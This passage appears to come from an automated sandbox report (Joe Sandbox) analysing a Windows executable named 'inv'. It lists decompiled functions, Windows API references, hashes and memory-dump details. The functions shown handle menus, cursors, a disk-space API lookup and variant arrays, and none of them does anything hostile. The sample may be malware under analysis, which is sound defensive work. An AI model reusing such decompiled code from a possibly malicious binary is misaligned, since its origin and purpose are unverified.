                                  0x0042a1f7
                                  0x0042a1f9
                                  0x0042a1ff
                                  0x0042a20c
                                  0x0042a211
                                  0x0042a211
                                  0x0042a21d
                                  0x0042a222
                                  0x0042a22e
                                  0x0042a235
                                  0x0042a235
                                  0x0042a23f

                                  APIs
                                  • GetCursorPos.USER32(0044FB3C), ref: 0042A0F1
                                  • GetCursor.USER32(0044FB3C), ref: 0042A10D
                                    • Part of subcall function 004292FC: SetCapture.USER32(00000000,?,0042A121,0044FB3C), ref: 0042930B
                                  • GetDesktopWindow.USER32 ref: 0042A1FF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Cursor$CaptureDesktopWindow
                                  • String ID: 8rB
                                  • API String ID: 669539147-1357010674
                                  • Opcode ID: 05bdb3fd56607f7eecea5d09a2a70de7c462ef357b38d37535d0528f92bd41f8
                                  • Instruction ID: 55c7e1c6787e35a502bb299b8c83d029705ea029cff1caf14ef83abd02a9218f
                                  • Opcode Fuzzy Hash: 05bdb3fd56607f7eecea5d09a2a70de7c462ef357b38d37535d0528f92bd41f8
                                  • Instruction Fuzzy Hash: 7E4181B83046408FC304DF29E965625BBE1FF8B314F15867ED8498B3A1CB35E859CB4A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043EE74, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 93%
                                  			E0043EE74(intOrPtr* __eax) {
				struct tagMENUITEMINFOA _v128;
				intOrPtr _v132;
				int _t16;
				intOrPtr* _t29;
				struct HMENU__* _t36;
				MENUITEMINFOA* _t37;

				_t37 =  &_v128;
				_t29 = __eax;
				_t16 =  *0x44e114; // 0x44f740
				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
					_t37->cbSize = 0x2c;
					_v132 = 0x10;
					_v128.hbmpUnchecked =  &(_v128.cch);
					_v128.dwItemData = 0x50;
					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
					if(_t16 != 0) {
						_t16 = E0043F1F8(_t29);
						asm("sbb edx, edx");
						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
							_v128.cbSize = ((E0043F1F8(_t29) & 0x0000007f) << 0x0000000d) + ((E0043F1F8(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
							_v132 = 0x10;
							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
							if(_t16 != 0) {
								return DrawMenuBar( *(_t29 + 0x38));
							}
						}
					}
				}
				return _t16;
			}









                                  0x0043ee76
                                  0x0043ee79
                                  0x0043ee7b
                                  0x0043ee84
                                  0x0043ee9b
                                  0x0043ee9d
                                  0x0043eea4
                                  0x0043eeb0
                                  0x0043eeb4
                                  0x0043eec2
                                  0x0043eec9
                                  0x0043eecd
                                  0x0043eedf
                                  0x0043eee4
                                  0x0043ef02
                                  0x0043ef06
                                  0x0043ef14
                                  0x0043ef1b
                                  0x00000000
                                  0x0043ef21
                                  0x0043ef1b
                                  0x0043eee4
                                  0x0043eec9
                                  0x0043ef2e

                                  APIs
                                  • GetMenuItemInfoA.USER32 ref: 0043EEC2
                                  • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 0043EF14
                                  • DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 0043EF21
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Menu$InfoItem$Draw
                                  • String ID: P
                                  • API String ID: 3227129158-3110715001
                                  • Opcode ID: 4029ad7f6b09c75dfdbdd78d72f447f468cc896e36dae6f1b68137953b6acf84
                                  • Instruction ID: 98b5513ed2c46aa636bbe918e4e5d5f133ea90f52c5888ba7589c1ffe5987239
                                  • Opcode Fuzzy Hash: 4029ad7f6b09c75dfdbdd78d72f447f468cc896e36dae6f1b68137953b6acf84
                                  • Instruction Fuzzy Hash: EE1101306063016FD320DF29CD81B4B7AD4AB88364F14963AF094CB3D6D7B8D854C74A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C4DC, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040C4DC() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x44d130 = _t1;
				}
				if( *0x44d130 == 0) {
					 *0x44d130 = E004080B4;
					return E004080B4;
				}
				return _t1;
			}





                                  0x0040c4e2
                                  0x0040c4e7
                                  0x0040c4eb
                                  0x0040c4f3
                                  0x0040c4f8
                                  0x0040c4f8
                                  0x0040c504
                                  0x0040c50b
                                  0x00000000
                                  0x0040c50b
                                  0x0040c511

                                  APIs
                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040CF45,00000000,0040CF58), ref: 0040C4E2
                                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040C4F3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                  • API String ID: 1646373207-3712701948
                                  • Opcode ID: 4c96d64200ae8764985e285f2b49da535e371c4fbae8f05c042400bc204e255e
                                  • Instruction ID: 37dc1cfd8a73c19d4ec83e59a25196ff7e9cae09ae544c8468a99730a7d27a5a
                                  • Opcode Fuzzy Hash: 4c96d64200ae8764985e285f2b49da535e371c4fbae8f05c042400bc204e255e
                                  • Instruction Fuzzy Hash: C3D0A7B8B00715EEE7005FB09CC571321D4E345788F00023B6C80762C1DF7C9900875C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00429E00, Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 93%
                                  			E00429E00(intOrPtr* __eax, signed int __edx) {
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr* _t60;
				intOrPtr* _t62;
				struct HICON__* _t65;
				intOrPtr _t67;
				intOrPtr* _t72;
				intOrPtr _t74;
				intOrPtr* _t75;
				intOrPtr _t78;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t85;
				struct HWND__* _t88;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr* _t93;
				intOrPtr _t97;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t106;
				struct HWND__* _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr _t114;
				intOrPtr _t117;
				char _t118;
				intOrPtr _t119;
				void* _t131;
				intOrPtr _t135;
				intOrPtr _t140;
				intOrPtr* _t155;
				void* _t158;
				void* _t165;
				void* _t166;

				_t155 = __eax;
				if( *0x44fb4c != 0) {
					L3:
					_t49 =  *0x44fb2c; // 0x0
					_t50 =  *0x44fb2c; // 0x0
					_t117 = E00429CE0(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
					if( *0x44fb4c == 0) {
						_t168 =  *0x44fb50;
						if( *0x44fb50 != 0) {
							_t106 =  *0x44fb40; // 0x0
							_t107 = GetDesktopWindow();
							_t108 =  *0x44fb50; // 0x0
							E00433DA0(_t108, _t107, _t168, _t106);
						}
					}
					_t53 =  *0x44fb2c; // 0x0
					if( *((char*)(_t53 + 0x9b)) != 0) {
						__eflags =  *0x44fb4c;
						_t6 =  &_v24;
						 *_t6 =  *0x44fb4c != 0;
						__eflags =  *_t6;
						 *0x44fb4c = 2;
					} else {
						 *0x44fb4c = 1;
						_v24 = 0;
					}
					_t54 =  *0x44fb30; // 0x0
					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
						L12:
						_t55 =  *0x44fb30; // 0x0
						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
						_t56 =  *0x44fb30; // 0x0
						if( *((intOrPtr*)(_t56 + 4)) != 0) {
							_t97 =  *0x44fb30; // 0x0
							E0042BA34( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
							_t100 =  *0x44fb30; // 0x0
							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
						}
						_t131 = E00429D30(2);
						_t121 =  *_t155;
						_t60 =  *0x44fb30; // 0x0
						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
						if( *0x44fb50 != 0) {
							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
								_t82 =  *0x44fb50; // 0x0
								E00433D88(_t82, _t158);
								_t84 =  *0x44fb50; // 0x0
								_t177 =  *((char*)(_t84 + 0x6a));
								if( *((char*)(_t84 + 0x6a)) != 0) {
									_t121 =  *((intOrPtr*)(_t155 + 4));
									_t85 =  *0x44fb50; // 0x0
									E00433E88(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
								} else {
									_t88 = GetDesktopWindow();
									_t121 =  *_t155;
									_t89 =  *0x44fb50; // 0x0
									E00433DA0(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
								}
							} else {
								_t91 =  *0x44fb50; // 0x0
								E00433EFC(_t91, _t131, __eflags);
								_t93 =  *0x44e0ec; // 0x44fbb4
								SetCursor(E00449250( *_t93, _t158));
							}
						}
						_t62 =  *0x44e0ec; // 0x44fbb4
						_t65 = SetCursor(E00449250( *_t62, _t158));
						if( *0x44fb4c != 2) {
							L32:
							return _t65;
						} else {
							_t179 = _t117;
							if(_t117 != 0) {
								_t118 = E00429D6C(_t121);
								_t67 =  *0x44fb30; // 0x0
								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
								__eflags = _t118;
								if(__eflags != 0) {
									E0042BA34(_t118,  &_v24, _t155);
									_t65 = E004032D4(_t118, __eflags);
									_t135 =  *0x44fb30; // 0x0
									 *(_t135 + 0x54) = _t65;
								} else {
									_t78 =  *0x44fb30; // 0x0
									_t65 = E004032D4( *((intOrPtr*)(_t78 + 4)), __eflags);
									_t140 =  *0x44fb30; // 0x0
									 *(_t140 + 0x54) = _t65;
								}
							} else {
								_push( *((intOrPtr*)(_t155 + 4)));
								_t80 =  *0x44fb30; // 0x0
								_t65 = E004032D4( *((intOrPtr*)(_t80 + 0x38)), _t179);
							}
							if( *0x44fb30 == 0) {
								goto L32;
							} else {
								_t119 =  *0x44fb30; // 0x0
								_t41 = _t119 + 0x5c; // 0x5c
								_t42 = _t119 + 0x44; // 0x44
								_t65 = E00407900(_t42, 0x10, _t41);
								if(_t65 != 0) {
									goto L32;
								}
								if(_v28 != 0) {
									_t75 =  *0x44fb30; // 0x0
									 *((intOrPtr*)( *_t75 + 0x34))();
								}
								_t72 =  *0x44fb30; // 0x0
								 *((intOrPtr*)( *_t72 + 0x30))();
								_t74 =  *0x44fb30; // 0x0
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								return _t74;
							}
						}
					}
					_t65 = E00429D30(1);
					if( *0x44fb30 == 0) {
						goto L32;
					}
					_t102 =  *0x44fb30; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t117;
					_t103 =  *0x44fb30; // 0x0
					 *((intOrPtr*)(_t103 + 8)) = _v28;
					_t104 =  *0x44fb30; // 0x0
					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
					_t65 = E00429D30(0);
					if( *0x44fb30 == 0) {
						goto L32;
					}
					goto L12;
				}
				_t110 =  *0x44fb3c; // 0x0
				asm("cdq");
				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x44fb48; // 0x0
				if(_t165 >= 0) {
					goto L3;
				}
				_t114 =  *0x44fb40; // 0x0
				asm("cdq");
				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
				_t166 = _t65 -  *0x44fb48; // 0x0
				if(_t166 < 0) {
					goto L32;
				}
				goto L3;
			}

















































                                  0x00429e06
                                  0x00429e0f
                                  0x00429e3e
                                  0x00429e3e
                                  0x00429e44
                                  0x00429e5a
                                  0x00429e63
                                  0x00429e65
                                  0x00429e6c
                                  0x00429e6e
                                  0x00429e74
                                  0x00429e81
                                  0x00429e86
                                  0x00429e86
                                  0x00429e6c
                                  0x00429e8b
                                  0x00429e97
                                  0x00429ea7
                                  0x00429eae
                                  0x00429eae
                                  0x00429eae
                                  0x00429eb3
                                  0x00429e99
                                  0x00429e99
                                  0x00429ea0
                                  0x00429ea0
                                  0x00429eba
                                  0x00429ec2
                                  0x00429f0f
                                  0x00429f0f
                                  0x00429f16
                                  0x00429f1c
                                  0x00429f1f
                                  0x00429f28
                                  0x00429f30
                                  0x00429f38
                                  0x00429f3d
                                  0x00429f46
                                  0x00429f4d
                                  0x00429f4d
                                  0x00429f5b
                                  0x00429f5d
                                  0x00429f5f
                                  0x00429f69
                                  0x00429f72
                                  0x00429f76
                                  0x00429f80
                                  0x00429f85
                                  0x00429f8a
                                  0x00429f8f
                                  0x00429f93
                                  0x00429fae
                                  0x00429fb3
                                  0x00429fb8
                                  0x00429f95
                                  0x00429f99
                                  0x00429fa0
                                  0x00429fa2
                                  0x00429fa7
                                  0x00429fa7
                                  0x00429fbf
                                  0x00429fbf
                                  0x00429fc4
                                  0x00429fcc
                                  0x00429fd9
                                  0x00429fd9
                                  0x00429f76
                                  0x00429fe1
                                  0x00429fee
                                  0x00429ffa
                                  0x0042a0cd
                                  0x0042a0cd
                                  0x0042a000
                                  0x0042a000
                                  0x0042a002
                                  0x0042a023
                                  0x0042a025
                                  0x0042a02a
                                  0x0042a02d
                                  0x0042a02f
                                  0x0042a05d
                                  0x0042a06c
                                  0x0042a071
                                  0x0042a077
                                  0x0042a031
                                  0x0042a039
                                  0x0042a045
                                  0x0042a04a
                                  0x0042a050
                                  0x0042a050
                                  0x0042a004
                                  0x0042a007
                                  0x0042a00a
                                  0x0042a017
                                  0x0042a017
                                  0x0042a081
                                  0x00000000
                                  0x0042a083
                                  0x0042a083
                                  0x0042a089
                                  0x0042a08c
                                  0x0042a094
                                  0x0042a09b
                                  0x00000000
                                  0x00000000
                                  0x0042a0a2
                                  0x0042a0a4
                                  0x0042a0ab
                                  0x0042a0ab
                                  0x0042a0ae
                                  0x0042a0b5
                                  0x0042a0b8
                                  0x0042a0c3
                                  0x0042a0c4
                                  0x0042a0c5
                                  0x0042a0c6
                                  0x00000000
                                  0x0042a0c6
                                  0x0042a081
                                  0x00429ffa
                                  0x00429ec6
                                  0x00429ed2
                                  0x00000000
                                  0x00000000
                                  0x00429ed8
                                  0x00429edd
                                  0x00429ee0
                                  0x00429ee8
                                  0x00429eeb
                                  0x00429ef2
                                  0x00429ef8
                                  0x00429efd
                                  0x00429f09
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00429f09
                                  0x00429e11
                                  0x00429e18
                                  0x00429e1d
                                  0x00429e23
                                  0x00000000
                                  0x00000000
                                  0x00429e25
                                  0x00429e2d
                                  0x00429e30
                                  0x00429e32
                                  0x00429e38
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  APIs
                                  • GetDesktopWindow.USER32 ref: 00429E74
                                  • GetDesktopWindow.USER32 ref: 00429F99
                                  • SetCursor.USER32(00000000), ref: 00429FEE
                                    • Part of subcall function 00433EFC: 73451770.COMCTL32(00000000,?,00429FC9), ref: 00433F18
                                    • Part of subcall function 00433EFC: ShowCursor.USER32(000000FF,00000000,?,00429FC9), ref: 00433F33
                                  • SetCursor.USER32(00000000), ref: 00429FD9
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Cursor$DesktopWindow$73451770Show
                                  • String ID:
                                  • API String ID: 3513720257-0
                                  • Opcode ID: 672c25a707c3d42133bd5b69e40c06d49dd433b1ee5283431592858fb19c98c7
                                  • Instruction ID: f0ab33181ca8cadf24e1ba5f2d2f5294076cdb14fd6ee64e52e836a5c0df995b
                                  • Opcode Fuzzy Hash: 672c25a707c3d42133bd5b69e40c06d49dd433b1ee5283431592858fb19c98c7
                                  • Instruction Fuzzy Hash: 8F914D7C2116918FC300DF29E9A5A16B7E1FF4A348F45817AE804873A6CB78FC49CB49
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004455A8, Relevance: 6.1, APIs: 4, Instructions: 148windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 89%
                                  			E004455A8(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t41;
				void* _t54;
				void* _t61;
				struct HMENU__* _t64;
				struct HMENU__* _t70;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t87;
				void* _t92;
				intOrPtr _t98;
				void* _t111;
				intOrPtr _t113;
				void* _t116;

				_t109 = __edi;
				_push(__edi);
				_v20 = 0;
				_t113 = __edx;
				_t92 = __eax;
				_push(_t116);
				_push(0x44576e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t116 + 0xfffffff0;
				if(__edx == 0) {
					L7:
					_t39 =  *((intOrPtr*)(_t92 + 0x248));
					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
						E0043F0E0(_t39, 0, _t109, 0);
					}
					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
						_t113 = 0;
					}
					 *((intOrPtr*)(_t92 + 0x248)) = _t113;
					if(_t113 != 0) {
						E00418F94(_t113, _t92);
					}
					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
						_t41 = E00432804(_t92);
						__eflags = _t41;
						if(_t41 != 0) {
							SetMenu(E004325A4(_t92), 0);
						}
						goto L30;
					} else {
						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
								if( *((char*)(_t92 + 0x22f)) != 1) {
									_t54 = E00432804(_t92);
									__eflags = _t54;
									if(_t54 != 0) {
										SetMenu(E004325A4(_t92), 0);
									}
								}
								goto L30;
							}
							goto L21;
						} else {
							L21:
							if(E00432804(_t92) != 0) {
								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
								_t110 = _t61;
								_t64 = GetMenu(E004325A4(_t92));
								_t138 = _t61 - _t64;
								if(_t61 != _t64) {
									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
									SetMenu(E004325A4(_t92), _t70);
								}
								E0043F0E0(_t113, E004325A4(_t92), _t110, _t138);
							}
							L30:
							if( *((char*)(_t92 + 0x22e)) != 0) {
								E0044666C(_t92, 1);
							}
							E004454E0(_t92);
							_pop(_t98);
							 *[fs:eax] = _t98;
							_push(0x445775);
							return E00403E10( &_v20);
						}
					}
				}
				_t77 =  *0x44fbb4; // 0x2191320
				_t79 = E00448DD8(_t77) - 1;
				if(_t79 >= 0) {
					_v8 = _t79 + 1;
					_t111 = 0;
					do {
						_t81 =  *0x44fbb4; // 0x2191320
						if(_t113 ==  *((intOrPtr*)(E00448DC4(_t81, _t111) + 0x248))) {
							_t83 =  *0x44fbb4; // 0x2191320
							if(_t92 != E00448DC4(_t83, _t111)) {
								_v16 =  *((intOrPtr*)(_t113 + 8));
								_v12 = 0xb;
								_t87 =  *0x44de14; // 0x41a460
								E00405910(_t87,  &_v20);
								E0040B0AC(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
								E0040384C();
							}
						}
						_t111 = _t111 + 1;
						_t10 =  &_v8;
						 *_t10 = _v8 - 1;
					} while ( *_t10 != 0);
				}
			}






















                                  0x004455a8
                                  0x004455b0
                                  0x004455b3
                                  0x004455b6
                                  0x004455b8
                                  0x004455bc
                                  0x004455bd
                                  0x004455c2
                                  0x004455c5
                                  0x004455ca
                                  0x0044563c
                                  0x0044563c
                                  0x00445644
                                  0x00445648
                                  0x00445648
                                  0x00445651
                                  0x0044565d
                                  0x0044565d
                                  0x0044565f
                                  0x00445667
                                  0x0044566d
                                  0x0044566d
                                  0x00445674
                                  0x00445727
                                  0x0044572c
                                  0x0044572e
                                  0x0044573a
                                  0x0044573a
                                  0x00000000
                                  0x0044568d
                                  0x00445697
                                  0x004456a6
                                  0x00445700
                                  0x00445707
                                  0x0044570b
                                  0x00445710
                                  0x00445712
                                  0x0044571e
                                  0x0044571e
                                  0x00445712
                                  0x00000000
                                  0x00445707
                                  0x00000000
                                  0x004456a8
                                  0x004456a8
                                  0x004456b1
                                  0x004456bf
                                  0x004456c2
                                  0x004456cc
                                  0x004456d1
                                  0x004456d3
                                  0x004456dd
                                  0x004456e9
                                  0x004456e9
                                  0x004456f9
                                  0x004456f9
                                  0x0044573f
                                  0x00445746
                                  0x0044574c
                                  0x0044574c
                                  0x00445753
                                  0x0044575a
                                  0x0044575d
                                  0x00445760
                                  0x0044576d
                                  0x0044576d
                                  0x00445697
                                  0x00445674
                                  0x004455cc
                                  0x004455d6
                                  0x004455d9
                                  0x004455dc
                                  0x004455df
                                  0x004455e1
                                  0x004455e3
                                  0x004455f3
                                  0x004455f7
                                  0x00445603
                                  0x00445608
                                  0x0044560b
                                  0x00445618
                                  0x0044561d
                                  0x0044562c
                                  0x00445631
                                  0x00445631
                                  0x00445603
                                  0x00445636
                                  0x00445637
                                  0x00445637
                                  0x00445637
                                  0x004455e1

                                  APIs
                                  • GetMenu.USER32(00000000), ref: 004456CC
                                  • SetMenu.USER32(00000000,00000000), ref: 004456E9
                                  • SetMenu.USER32(00000000,00000000), ref: 0044571E
                                  • SetMenu.USER32(00000000,00000000,00000000,0044576E), ref: 0044573A
                                    • Part of subcall function 00405910: LoadStringA.USER32 ref: 00405941
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Menu$LoadString
                                  • String ID:
                                  • API String ID: 3688185913-0
                                  • Opcode ID: 497ced4f59bfdb2df4ca461c47bf340e0693dcda4d82c4a2b1d18768c7a79c26
                                  • Instruction ID: 920cb349dc7341c0adb9020d06187e125570e91ed15f9aa72bfd203fe6cf9352
                                  • Opcode Fuzzy Hash: 497ced4f59bfdb2df4ca461c47bf340e0693dcda4d82c4a2b1d18768c7a79c26
                                  • Instruction Fuzzy Hash: 1951CD30A00A00ABEF21AF29C98575A77A59F15318F4544BBEC099B397CE7CCD45875C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040E300, Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E0040E300(intOrPtr* __eax) {
				char _v260;
				char _v768;
				char _v772;
				intOrPtr* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if(( *(_v776 + 1) & 0x00000020) == 0) {
					E0040E1CC(0x80070057);
				}
				_t43 =  *_v776;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 =  *((intOrPtr*)(_v776 + 8));
					} else {
						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0040D3DC();
							E0040E1CC(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0040D3E4();
							E0040E1CC(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E0040E2A4(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E0040E274(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0040D3EC();
						E0040E1CC(_v780);
						E0040E4F8(_v792);
					}
				}
				L15:
				_push(_v776);
				L0040CF78();
				return E0040E1CC(_v776);
			}






















                                  0x0040e30c
                                  0x0040e31c
                                  0x0040e323
                                  0x0040e323
                                  0x0040e32e
                                  0x0040e33c
                                  0x0040e34b
                                  0x0040e369
                                  0x0040e34d
                                  0x0040e358
                                  0x0040e358
                                  0x0040e378
                                  0x0040e384
                                  0x0040e387
                                  0x0040e389
                                  0x0040e38a
                                  0x0040e38c
                                  0x0040e392
                                  0x0040e394
                                  0x0040e3a3
                                  0x0040e3a4
                                  0x0040e3ae
                                  0x0040e3af
                                  0x0040e3b4
                                  0x0040e3bf
                                  0x0040e3c0
                                  0x0040e3ca
                                  0x0040e3cb
                                  0x0040e3d0
                                  0x0040e3eb
                                  0x0040e3ed
                                  0x0040e3ee
                                  0x0040e3f1
                                  0x0040e3f1
                                  0x0040e392
                                  0x0040e3fa
                                  0x0040e3fd
                                  0x0040e3ff
                                  0x0040e400
                                  0x0040e406
                                  0x0040e40c
                                  0x0040e40e
                                  0x0040e410
                                  0x0040e413
                                  0x0040e416
                                  0x0040e416
                                  0x0040e419
                                  0x00000000
